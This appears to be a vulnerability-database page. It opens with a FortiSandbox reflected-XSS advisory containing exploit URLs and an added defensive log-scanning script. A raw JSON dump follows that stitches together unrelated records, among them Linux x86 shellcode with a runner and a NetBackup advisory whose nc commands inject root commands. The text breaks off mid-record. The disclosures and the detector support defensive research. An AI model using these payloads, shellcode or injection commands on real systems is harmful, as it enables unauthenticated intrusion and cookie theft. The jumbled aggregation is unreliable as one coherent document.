[+] Credits: John Page aka hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTISANDBOX-0801.txt
Vendor: www.fortinet.com
PSIRT ID: 1418018
Product: FortiSandbox 3000D v2.02 build0042
Vulnerability Type: XSS
CVE Reference: Pending
Advisory Information:
Multiple XSS vulnerabilities in FortiSandbox WebUI
Impact
A remote unauthenticated attacker may be able to execute arbitrary code in
the security context of an authenticated user's browser session.
Affected Products
FortiSandbox 2.0.4 and lower.
Solutions
Upgrade to FortiSandbox 2.1 or above.
Vulnerability Details:
http://www.fortiguard.com/advisory/FG-IR-15-019/
The Web User Interface of FortiSandbox version 2.0.4 and below is
vulnerable to multiple reflected Cross-Site Scripting vulnerabilities.
Five potential XSS vectors were identified:
* Fortiview threats by users search filtered by serial
* Fortiview threats by users search filtered by vdom
* Export report feature in the Fortiview search page
* Screenshot download generated by the VM scan feature
* PCAP file download generated by the VM scan feature
Exploit code(s):
1)
https://localhost/alerts/summary/profile/?prof_type=byusers-profile&from=byusers-filter&username=10.10.10.10&serial=<script>alert(666)</script><script>alert('XSS by hyp3rlinx 06012015')</script>&vdom=&from_time_period=1440#frag-1
vulnerable parameter: "serial"
2)
https://localhost/csearch/report/export/?urlForCreatingReport=<script>alert(666)</script><script>alert('XSS by hyp3rlinx June 1, 2015')</script>
vulnerable parameter: "urlForCreatingReport"
3)
https://localhost/analysis/detail/download/screenshot?id="/><script>alert('XSS by hyp3rlinx June 1, 2015 '%2bdocument.cookie)</script>
vulnerable parameter: "id"
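As an added example that is not part of the original advisory, the following log-review script flags requests to the affected WebUI endpoints whose reflected parameters carry HTML or script markup. Endpoint paths and parameter names are taken from the exploit URLs above; the access-log format (Apache/nginx "combined" style) is an assumption, and the log lines are constructed for this example.

```python
"""Log-review helper for the FortiSandbox reflected XSS vectors in this advisory.

Flags GET requests to the affected WebUI endpoints whose reflected parameters
(serial, vdom, urlForCreatingReport, id) carry HTML or script markup after
URL decoding. Sample log lines below are constructed for this example.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Affected endpoint paths and the parameters the advisory lists as reflected.
# vdom is included because the advisory names it among the five vectors;
# the PCAP download endpoint is not given in the advisory and is left out.
AFFECTED = {
    "/alerts/summary/profile/": {"serial", "vdom"},
    "/csearch/report/export/": {"urlForCreatingReport"},
    "/analysis/detail/download/screenshot": {"id"},
}

# Markup that has no business in a serial number, VDOM name, report URL or id:
# tag openers, attribute breakouts ("/>), inline handlers and javascript: URLs.
MARKUP = re.compile(
    r"""<\s*/?\s*[a-z!?]|["']\s*/?\s*>|javascript\s*:|\bon[a-z]+\s*=""", re.I
)

# Apache/nginx "combined"-style access log line (assumed format; only the
# fields this script needs are captured).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def decode_fully(value, max_rounds=3):
    """Percent-decode until stable so double-encoded payloads are not missed."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_target(target):
    """Return [(param, decoded value)] for reflected params carrying markup."""
    parts = urlsplit(target)
    params = AFFECTED.get(parts.path)
    if not params:
        return []  # not one of the affected endpoints
    findings = []
    query = parse_qs(parts.query, keep_blank_values=True)
    for name in sorted(params):
        for raw in query.get(name, []):
            value = decode_fully(raw)
            if MARKUP.search(value):
                findings.append((name, value))
    return findings


def scan_log(lines):
    """Return one record per request whose reflected parameters carry markup."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format; skip it
        findings = inspect_target(m["target"])
        if findings:
            hits.append({
                "src": m["src"], "ts": m["ts"], "status": m["status"],
                "path": urlsplit(m["target"]).path, "params": findings,
            })
    return hits


# Constructed sample: one benign search, the three advisory vectors as a
# browser would percent-encode them, and one double-encoded variant.
SAMPLE_LOG = [
    '10.0.0.7 - - [01/Jun/2015:09:58:11 +0000] "GET /alerts/summary/profile/?prof_type=byusers-profile&serial=FSA-SERIAL-EXAMPLE&vdom=root HTTP/1.1" 200 5120',
    '10.0.0.9 - - [01/Jun/2015:10:01:02 +0000] "GET /alerts/summary/profile/?prof_type=byusers-profile&from=byusers-filter&username=10.10.10.10&serial=%3Cscript%3Ealert(666)%3C/script%3E&vdom=&from_time_period=1440 HTTP/1.1" 200 5210',
    '10.0.0.9 - - [01/Jun/2015:10:01:40 +0000] "GET /csearch/report/export/?urlForCreatingReport=%3Cscript%3Ealert(666)%3C/script%3E HTTP/1.1" 200 812',
    '10.0.0.9 - - [01/Jun/2015:10:02:15 +0000] "GET /analysis/detail/download/screenshot?id=%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 400',
    '10.0.0.9 - - [01/Jun/2015:10:03:00 +0000] "GET /alerts/summary/profile/?serial=%253Cscript%253Ealert(666)%253C/script%253E HTTP/1.1" 200 5200',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["src"], hit["path"], hit["params"])
```

Pass an open file object instead of SAMPLE_LOG to run the same scan over a real access log.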
Disclosure Timeline:
Vendor Notification: June 1, 2015
Vendor Disclosure: July 24, 2015
Public Disclosure: August 1, 2015
Fixed In Firmware 2.1
Discovery Status:
Published
Exploitation Technique:
Remote unauthenticated
Severity Level:
Medium
Description:
Request Method(s): [+] GET
Vulnerable Product: [+] FortiSandbox 3000D v2.02
Vulnerable Parameter(s): [+] serial, urlForCreatingReport, id
Affected Area(s): [+] FortiSandbox Web Admin UI
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.
The author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.
by hyp3rlinx
{"id": "SECURITYVULNS:DOC:32461", "bulletinFamily": "software", "title": "Multiple XSS vulnerabilities in FortiSandbox WebUI", "description": "\r\n\r\n[+] Credits: John Page aka hyp3rlinx\r\n\r\n[+] Website: hyp3rlinx.altervista.org\r\n\r\n[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-FORTISANDBOX-0801.txt\r\n\r\n\r\nVendor:\r\n================================\r\nwww.fortinet.com\r\nPSIRT ID: 1418018\r\n\r\n\r\n\r\nProduct:\r\n==================================\r\nFortiSandbox 3000D v2.02 build0042\r\n\r\n\r\nVulnerability Type:\r\n===================\r\nXSS\r\n\r\n\r\n\r\nCVE Reference:\r\n==============\r\nPending\r\n\r\n\r\n\r\nAdvisory Information:\r\n===========================================================================\r\nMultiple XSS vulnerabilities in FortiSandbox WebUI\r\n\r\nImpact\r\n\r\nA remote unauthenticated attacker may be able to execute arbitrary code in\r\nthe security context of an authenticated user's browser session.\r\n\r\nAffected Products\r\n\r\nFortiSandbox 2.0.4 and lower.\r\nSolutions\r\n\r\nUpgrade to FortiSandbox 2.1 or above.\r\n\r\n\r\n\r\nVulnerability Details:\r\n====================================================================\r\nhttp://www.fortiguard.com/advisory/FG-IR-15-019/\r\n\r\nThe Web User Interface of FortiSandbox version 2.0.4 and below is\r\nvulnerable to multiple reflected Cross-Site Scripting vulnerabilities.\r\n\r\n5 potential XSS vectors were identified:\r\n\r\n* Fortiview threats by users search filtered by serial\r\n* Fortiview threats by users search filtered by vdom\r\n* Export report feature in the Fortiview search page\r\n* Screenshot download generated by the VM scan feature\r\n* PCAP file download generated by the VM scan feature\r\n\r\n\r\n\r\nExploit code(s):\r\n===============\r\n\r\n1)\r\nhttps://localhost/alerts/summary/profile/?prof_type=byusers-profile&from=byusers-filter&username=10.10.10.10&serial=<script>alert(666)</script><script>alert('XSS by hyp3rlinx 
06012015')</script>&vdom=&from_time_period=1440#frag-1\r\n\r\nvulnerable parameter: "serial"\r\n------------------------------\r\n\r\n2)\r\nhttps://localhost/csearch/report/export/?urlForCreatingReport=<script>alert(666)</script><script>alert('XSS by hyp3rlinx June 1, 2015')</script>\r\n\r\nvulnerable parameter: "urlForCreatingReport"\r\n--------------------------------------------\r\n\r\n3)\r\nhttps://localhost/analysis/detail/download/screenshot?id="/><script>alert('XSS by hyp3rlinx June 1, 2015 '%2bdocument.cookie)</script>\r\n \r\nvulnerable parameter: "id"\r\n--------------------------\r\n\r\n\r\n\r\nDisclosure Timeline:\r\n========================================\r\nVendor Notification: June 1, 2015\r\nVendor Disclosure: July 24, 2015\r\nAugust 1, 2015 : Public Disclosure\r\n\r\nFixed In Firmware 2.1\r\n\r\n\r\n\r\nDiscovery Status:\r\n=================\r\nPublished\r\n\r\n\r\n\r\nExploitation Technique:\r\n=======================\r\nRemote unauthenticated\r\n\r\n\r\n\r\nSeverity Level:\r\n===============\r\nMedium\r\n\r\n\r\n\r\nDescription:\r\n=====================================================================\r\n\r\n\r\nRequest Method(s): [+] GET\r\n\r\n\r\nVulnerable Product: [+] FortiSandbox 3000D v2.02\r\n\r\n\r\nVulnerable Parameter(s): [+] serial, urlForCreatingReport, id\r\n\r\n\r\nAffected Area(s): [+] FortiSandbox Web Admin UI\r\n\r\n\r\n=====================================================================\r\n\r\n[+] Disclaimer\r\nPermission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. 
Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author.\r\nThe author is not responsible for any misuse of the information contained herein and prohibits any malicious use of all security related information or exploits by the author or elsewhere.\r\n\r\nby hyp3rlinx\r\n\r\n", "published": "2015-08-24T00:00:00", "modified": "2015-08-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32461", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:11:01", "edition": 1, "viewCount": 4, "enchantments": {"score": {"value": 2.5, "vector": "NONE", "modified": "2018-08-31T11:11:01", "rev": 2}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562311220201476", "OPENVAS:1361412562311220201431", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201462", "OPENVAS:1361412562311220201489", "OPENVAS:1361412562311220201491", "OPENVAS:1361412562311220201477", "OPENVAS:1361412562311220201400", "OPENVAS:1361412562311220201494", "OPENVAS:1361412562311220201430"]}, {"type": "nessus", "idList": ["EULEROS_SA-2020-1494.NASL", "EULEROS_SA-2020-1498.NASL", "EULEROS_SA-2020-1457.NASL", "EULEROS_SA-2020-1491.NASL", "EULEROS_SA-2020-1477.NASL", "EULEROS_SA-2020-1496.NASL", "EULEROS_SA-2020-1489.NASL", "EULEROS_SA-2020-1483.NASL"]}], "modified": "2018-08-31T11:11:01", "rev": 2}, "vulnersScore": 2.5}, "affectedSoftware": []}
{"cve": [{"lastseen": "2021-02-02T06:14:28", "description": "Barracuda Web Application Firewall (WAF) 7.8.1.013 allows remote attackers to bypass authentication by leveraging a permanent authentication token obtained from a query string.", "edition": 7, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-02-12T01:15:00", "title": "CVE-2014-2595", "type": "cve", "cwe": ["CWE-613"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-2595"], "modified": "2020-02-20T15:55:00", "cpe": ["cpe:/a:barracuda:web_application_firewall:7.8.1.013"], "id": "CVE-2014-2595", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-2595", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:barracuda:web_application_firewall:7.8.1.013:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T05:35:21", "description": "A symlink issue exists in Iceweasel-firegpg before 0.6 due to insecure tempfile handling.", "edition": 8, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": 
"LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2019-11-18T22:15:00", "title": "CVE-2008-7273", "type": "cve", "cwe": ["CWE-59"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7273"], "modified": "2019-11-20T15:56:00", "cpe": [], "id": "CVE-2008-7273", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7273", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}, {"lastseen": "2021-02-02T05:35:21", "description": "FireGPG before 0.6 handle user\u2019s passphrase and decrypted cleartext insecurely by writing pre-encrypted cleartext and the user's passphrase to disk which may result in the compromise of secure communication or a users\u2019s private key.", "edition": 8, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2019-11-08T00:15:00", "title": "CVE-2008-7272", "type": "cve", "cwe": ["CWE-312"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2008-7272"], "modified": "2020-02-10T21:16:00", "cpe": [], "id": "CVE-2008-7272", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2008-7272", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}, {"lastseen": "2021-02-02T06:21:32", "description": "Controllers.outgoing in controllers/index.js in NodeBB before 0.7.3 has outgoing XSS.", "edition": 6, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 2.7}, "published": "2019-04-30T14:29:00", "title": "CVE-2015-9286", "type": "cve", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-9286"], "modified": "2019-05-01T14:22:00", "cpe": [], "id": 
"CVE-2015-9286", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-9286", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": []}], "zdt": [{"lastseen": "2019-04-02T03:29:55", "description": "Exploit for linux/x86 platform in category shellcode", "edition": 1, "published": "2019-04-01T00:00:00", "title": "Linux/x86 - Polymorphic execve(/bin/sh) Shellcode (63 bytes)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2019-04-01T00:00:00", "id": "1337DAY-ID-32461", "href": "https://0day.today/exploit/description/32461", "sourceData": "/*\r\n; Date: 09/03/2019\r\n; Polymorphic_Execve_Sh_Stack.asm\r\n; Author: Daniele Votta\r\n; Description: This program invoke a Polimorphic version of excve.\r\n \r\nOriginal Execve_Sh_Stack: file format elf32-i386\r\nDisassembly of section .text:\r\n \r\n08048080 <_start>:\r\n 8048080: 31 c0 xor eax,eax\r\n 8048082: 50 push eax\r\n 8048083: 68 2f 2f 73 68 push 0x68732f2f\r\n 8048088: 68 2f 62 69 6e push 0x6e69622f\r\n 804808d: 89 e3 mov ebx,esp\r\n 804808f: 50 push eax\r\n 8048090: 89 e2 mov edx,esp\r\n 8048092: 53 push ebx\r\n 8048093: 89 e1 mov ecx,esp\r\n 8048095: b0 0b mov al,0xb\r\n 8048097: cd 80 int 0x80\r\n \r\n[+] Extract Shellcode ... 
\r\n\"\\x31\\xc0\\x50\\x68\\x2f\\x2f\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x0b\\xcd\\x80\"\r\n \r\nShellcode Length:25\r\n \r\n======================= POC Daniele Votta =======================\r\n \r\nPolimorphic_Execve_Sh_Stack: file format elf32-i386\r\n \r\nDisassembly of section .text:\r\n \r\n08048080 <_start>:\r\n 8048080: 31 c3 xor ebx,eax\r\n 8048082: 31 d8 xor eax,ebx\r\n 8048084: 89 c1 mov ecx,eax\r\n 8048086: 51 push ecx\r\n 8048087: bf 40 40 84 79 mov edi,0x79844040\r\n 804808c: 81 ef 11 11 11 11 sub edi,0x11111111\r\n 8048092: 89 7c 24 fc mov DWORD PTR [esp-0x4],edi\r\n 8048096: bf 2f 62 69 6e mov edi,0x6e69622f\r\n 804809b: 81 c7 11 11 11 11 add edi,0x11111111\r\n 80480a1: 81 ef 11 11 11 11 sub edi,0x11111111\r\n 80480a7: 89 7c 24 f8 mov DWORD PTR [esp-0x8],edi\r\n 80480ab: 83 ec 04 sub esp,0x4\r\n 80480ae: 83 ec 04 sub esp,0x4\r\n 80480b1: 89 e3 mov ebx,esp\r\n 80480b3: 50 push eax\r\n 80480b4: 89 e2 mov edx,esp\r\n 80480b6: 53 push ebx\r\n 80480b7: 89 e1 mov ecx,esp\r\n 80480b9: b0 01 mov al,0x1\r\n 80480bb: 04 0a add al,0xa\r\n 80480bd: cd 80 int 0x80\r\n \r\n[+] Extract Shellcode ... 
\r\n\"\\x31\\xc3\\x31\\xd8\\x89\\xc1\\x51\\xbf\\x40\\x40\\x84\\x79\\x81\\xef\\x11\\x11\\x11\\x11\\x89\\x7c\\x24\\xfc\\xbf\\x2f\\x62\\x69\\x6e\\x81\\xc7\\x11\\x11\\x11\\x11\\x81\\xef\\x11\\x11\\x11\\x11\\x89\\x7c\\x24\\xf8\\x83\\xec\\x04\\x83\\xec\\x04\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x01\\x04\\x0a\\xcd\\x80\"\r\n \r\nShellcode Length:63\r\n \r\n======================= POC Daniele Votta =======================\r\n*/\r\n \r\n#include<stdio.h>\r\n#include<string.h>\r\n \r\nunsigned char code[] = \\\r\n\"\\x31\\xc3\\x31\\xd8\\x89\\xc1\\x51\\xbf\\x40\\x40\\x84\\x79\\x81\\xef\\x11\\x11\\x11\\x11\\x89\\x7c\\x24\\xfc\\xbf\\x2f\\x62\\x69\\x6e\\x81\\xc7\\x11\\x11\\x11\\x11\\x81\\xef\\x11\\x11\\x11\\x11\\x89\\x7c\\x24\\xf8\\x83\\xec\\x04\\x83\\xec\\x04\\x89\\xe3\\x50\\x89\\xe2\\x53\\x89\\xe1\\xb0\\x01\\x04\\x0a\\xcd\\x80\";\r\n \r\nint main()\r\n{\r\n printf(\"Shellcode Length: %d\\n\", strlen(code));\r\n int (*ret)() = (int(*)())code;\r\n ret();\r\n}\n\n# 0day.today [2019-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32461"}, {"lastseen": "2018-03-13T23:14:17", "description": "Veritas Netbackup version 8.0 suffers from remote command execution, file write, and DNS bypass vulnerabilities.", "edition": 1, "published": "2017-05-09T00:00:00", "title": "Veritas Netbackup 8.0 - Multiple Vulnerabilities", "type": "zdt", "bulletinFamily": "exploit", "cvelist": [], "modified": "2017-05-09T00:00:00", "href": "https://0day.today/exploit/description/27741", "id": "1337DAY-ID-27741", "sourceData": "Veritas Netbackup 8.0 - Multiple Vulnerabilities\r\n\r\n-------------------------------------------------\r\n\r\n\r\n\r\nIntroduction\r\n\r\n============\r\n\r\nMultiple vulnerabilities were identified in Veritas Netbackup (\r\nhttps://www.veritas.com/product/backup-and-recovery/netbackup-8). 
The\r\nvulnerabilities were discovered during a black box security assessment and\r\ntherefore the vulnerability list should not be considered exhaustive.\r\n\r\n\r\n\r\nNetBackup 8.0 was assessed by Google Security as a followup to a previous\r\nassessment of NetBackup 6.x and 7.x (see\r\nhttp://seclists.org/fulldisclosure/2017/Feb/101). After assessing the\r\nsecurity of three generations of this software it unfortunately became\r\nclear that the current architecture of NetBackup has several security flaws:\r\n\r\n\r\n\r\n -\r\n\r\n The proprietary protocol used between NB Clients and Servers provides no\r\n authentication or encryption.\r\n -\r\n\r\n Parameters passed to executable commands are (partially) processed\r\n unfiltered.\r\n -\r\n\r\n Even though a whitelisting for executable paths was added in recent\r\n versions of NetBackup, those paths contain over 600 (!) executables - a\r\n vulnerability in any of those could be leveraged to compromise a NetBackup\r\n system.\r\n -\r\n\r\n All processes related to NetBackup run as root, which increases the risk\r\n of compromise (this was already reported in a previous advisory)\r\n\r\n\r\n\r\nWe highly recommended to put additional layers of security around running\r\nNetBackup installations, for example strong firewall policies that only\r\nallow legitimate NetBackup systems to interact with each other over the\r\nnetwork.\r\n\r\n\r\n\r\nPlease see the Advisory Veritas released for more information:\r\n\r\nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html\r\n\r\n\r\n\r\nVeritas also provides patches for NetBackup 8.0 that should be applied\r\nASAP. Those can be found at the following URL:\r\n\r\nhttps://www.veritas.com/support/en_US/article.000126389\r\n\r\n\r\n\r\nAffected Software and Versions\r\n\r\n==============================\r\n\r\n - Veritas Netbackup 8.0\r\n\r\n\r\n\r\nCVE\r\n\r\n===\r\n\r\nCVEs have been assigned but are not published yet. 
Please see this Veritas\r\nadvisory for the CVE IDs:\r\nhttps://www.veritas.com/content/support/en_US/security/VTS17-004.html\r\n\r\n\r\n\r\nVulnerability Overview\r\n\r\n======================\r\n\r\n\r\n\r\n1. NB8-01: HIGH: Unauthenticated privileged remote command execution via\r\nbprd\r\n\r\n2. NB8-02: HIGH: Unauthenticated privileged remote command execution via\r\nnbbsdtar\r\n\r\n3. NB8-03: HIGH: Unauthenticated privileged remote file write\r\n\r\n4. NB8-04: HIGH: Unauthenticated privileged remote command execution via\r\nwhitelist bypass\r\n\r\n5. NB8-05: HIGH: Bypass of DNS based security model through pbx_exchange\r\n\r\n\r\n\r\n\r\n\r\nVulnerability Details\r\n\r\n=====================\r\n\r\n\r\n\r\n--------------------------------------------------------------------\r\n\r\nNB8-01: Unauthenticated privileged remote command execution via bprd\r\n\r\n--------------------------------------------------------------------\r\n\r\nSeverity: High\r\n\r\n\r\n\r\nThe bprd process allows remote privileged remote code execution by sending\r\na special packet leveraging the C_PFI_ROTATION (0x70) command. This command\r\nis vulnerable to injecting arbitrary commands. 
This vulnerability bypasses\r\nthe directory whitelist implemented in NetBackup 7.x and allows privileged\r\nexecution of any command.\r\n\r\n\r\n\r\nThe following command executes a/usr/bin/id>/tmp/meh.txta on the Netbackup\r\nserver 10.128.0.5:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 112 1 2 foo\\`id>/tmp/meh.txt\\`\r\nbar baz 3 meh\\n\" | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nLog file excerpt:\r\n\r\n\r\n\r\n15:27:36.467 [31611.31611] <2> get_string: 329199 112 1 2\r\nfoo`id>/tmp/meh.txt` bar baz 3 meh\r\n15:27:36.467 [31611.31611] <2> vnet_check_vxss_server_magic:\r\n[vnet_vxss_helper.c:641] VxSS magic=329199, remote_vxss=11\r\n2\r\n15:27:36.467 [31611.31611] <2> vnet_check_vxss_server_magic:\r\n[vnet_vxss_helper.c:698] Ignoring VxSS authentication 2 0x\r\n2\r\n15:27:36.467 [31611.31611] <2> process_request: command C_PFI_ROTATION\r\n(112) received\r\n15:27:36.467 [31611.31611] <2> process_request: pfi_rotation request =\r\n329199 112 1 2 foo`id>/tmp/meh.txt` bar baz 3 me\r\nh\r\n\r\nStrace excerpt:\r\n\r\n\r\n\r\n[pid 31641] execve(\"/bin/sh\", [\"sh\", \"-c\",\r\n\"\\\"/usr/openv/netbackup/bin/admincmd/bppficorr\\\" -rotation -policy 2\r\n-client 1 -fim \\\"foo`id>/tmp/meh.txt`\\\" 2>&1\"], [/* 18 vars */]) = 0\r\nProcess 31642 attached\r\nProcess 31643 attached\r\n[pid 31643] execve(\"/bin/id\", [\"id\"], [/* 18 vars */]) = 0\r\n\r\n# cat /tmp/meh.txt\r\nuid=0(root) gid=0(root) groups=0(root)\r\ncontext=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023\r\n\r\nThe validity of API parameters should be ensured by proper filtering of\r\npassed parameters.\r\n\r\n\r\n\r\n------------------------------------------------------------------------\r\n\r\nNB8-02: Unauthenticated privileged remote command execution via nbbsdtar\r\n\r\n------------------------------------------------------------------------\r\n\r\nSeverity: High\r\n\r\n\r\n\r\nThe binary nbbsdtar can be leveraged to copy any file to a whitelisted\r\ndirectory. 
This then allows leveraging the C_REMOTE_EXECUTE (0x46) to\r\nexecute the copied file. This vulnerability bypasses the directory\r\nwhitelist implemented in NetBackup 7.x and allows privileged execution of\r\nany command.\r\n\r\n\r\n\r\nPacking /bin/bash into the tar file /tmp/foo.tar:\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337\r\n/usr/openv/netbackup/bin/private/nbbsdtar foo -c -f /tmp/foo.tar\r\n/bin/bash\\n\" | nc 10.128.0.5 1556\r\n\r\n\r\n\r\nStrace output:\r\n\r\n\r\n\r\n[pid 32461] execve(\"/usr/openv/netbackup/bin/private/nbbsdtar\", [\"foo\",\r\n\"-c\", \"-f\", \"/tmp/foo.tar\", \"/bin/bash\"], [/* 19 vars */]) = 0\r\n\r\nUnpacking /tmp/foo.tar to the whitelisted directory\r\n/usr/openv/netbackup/bin (a/bina can be omitted as /bin/bash was added to\r\nthe tar with full path):\r\n\r\n\r\n\r\n# echo -ne \"ack=1\\nextension=bprd\\n\\n329199 94 localhost root 1337\r\n/usr/openv/netbackup/bin/private/nbbsdtar foo -x -f /tmp/foo.tar -C\r\n/usr/openv/netbackup/\\n\" | nc 10.128.0.5 1556\r\n\r\nStrace output:\r\n\r\n\r\n\r\n[pid 32486] execve(\"/usr/openv/netbackup/bin/private/nbbsdtar\", [\"foo\",\r\n\"-x\", \"-f\", \"/tmp/foo.tar\", \"-C\", \"/usr/openv/netbackup/\"], [/* 19 vars\r\n*/]) = 0\r\n\r\n# ls -l /usr/openv/netbackup/bin/bash\r\n-rwxr-xr-x. 
